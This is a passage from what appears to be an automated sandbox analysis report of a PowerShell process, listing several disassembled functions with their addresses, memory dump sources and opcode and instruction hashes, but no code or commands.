                                                • Instruction ID: 7b6df8d6a783fc2964eaa96da4ef2dcbef3db2e000861f2ef6273d1159e64a5b
                                                • Opcode Fuzzy Hash: 2159113e4841d2009e4974ad3551eb3772fd05b500ed3a54ebe8f04f51121ab0
                                                • Instruction Fuzzy Hash: 4321D63026CB494FD749EF18D0917B9B7E1FF96315F10097DE08EC7292DA66A882C702
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEA33C3C, Relevance: .1, Instructions: 73COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e17e03ca96d8e99a92bda75954ec0075ac3a74de84e8ace44f43c85c9c143099
                                                • Instruction ID: 14689d01f7d56a978dc4b0206e2a6a729304d87f352b9e86d6f9f5200c84150c
                                                • Opcode Fuzzy Hash: e17e03ca96d8e99a92bda75954ec0075ac3a74de84e8ace44f43c85c9c143099
                                                • Instruction Fuzzy Hash: 84119C3271C9190FDB94EB1D9481E71BBD1EBA931031540FDD00DCB286D825EC46C3C1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEA32C65, Relevance: .0, Instructions: 49COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 662492b7c9470f068f2c3c2eeac03e0802dc1a11cce99fbdfd7667e6838e4dcf
                                                • Instruction ID: c658ea347ca6d0fa295398b76377d9a2cf7a90f2b499ca61351b4ced0ad1e5d2
                                                • Opcode Fuzzy Hash: 662492b7c9470f068f2c3c2eeac03e0802dc1a11cce99fbdfd7667e6838e4dcf
                                                • Instruction Fuzzy Hash: F601677125CB084FD754EF0CE491A79B7E1FB95324F10066DE58EC3291DA36E892CB46
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEA33259, Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bac637187a45f7fce0cc4c285885ecf49098758f6e798dd6e394a078bdfc7431
                                                • Instruction ID: 99d5105069c8a54fcfc004d58e4ff2e3a6071249db7d9dd3299d37cb4b653523
                                                • Opcode Fuzzy Hash: bac637187a45f7fce0cc4c285885ecf49098758f6e798dd6e394a078bdfc7431
                                                • Instruction Fuzzy Hash: 4BF0303276C6044E975CAA0CF8435B573D1E799221B40017EE48AC2696E916B8428686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00007FFAEEA345C8, Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.327761811.00007FFAEEA30000.00000040.00000001.sdmp, Offset: 00007FFAEEA30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_7ffaeea30000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e9bba1ed93614974b5f1ef6c193719099bf49257b0cb2c13617b2d0978e16c9d
                                                • Instruction ID: 07f2dbb9eab6344a44255c0a33571fb12a03f408d66d93d567244fac3927b6c9
                                                • Opcode Fuzzy Hash: e9bba1ed93614974b5f1ef6c193719099bf49257b0cb2c13617b2d0978e16c9d
                                                • Instruction Fuzzy Hash: 2CF0653276C6044FD74CAA0CF8439B573D5E789325B40017EE48FC3287E916FC428685
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions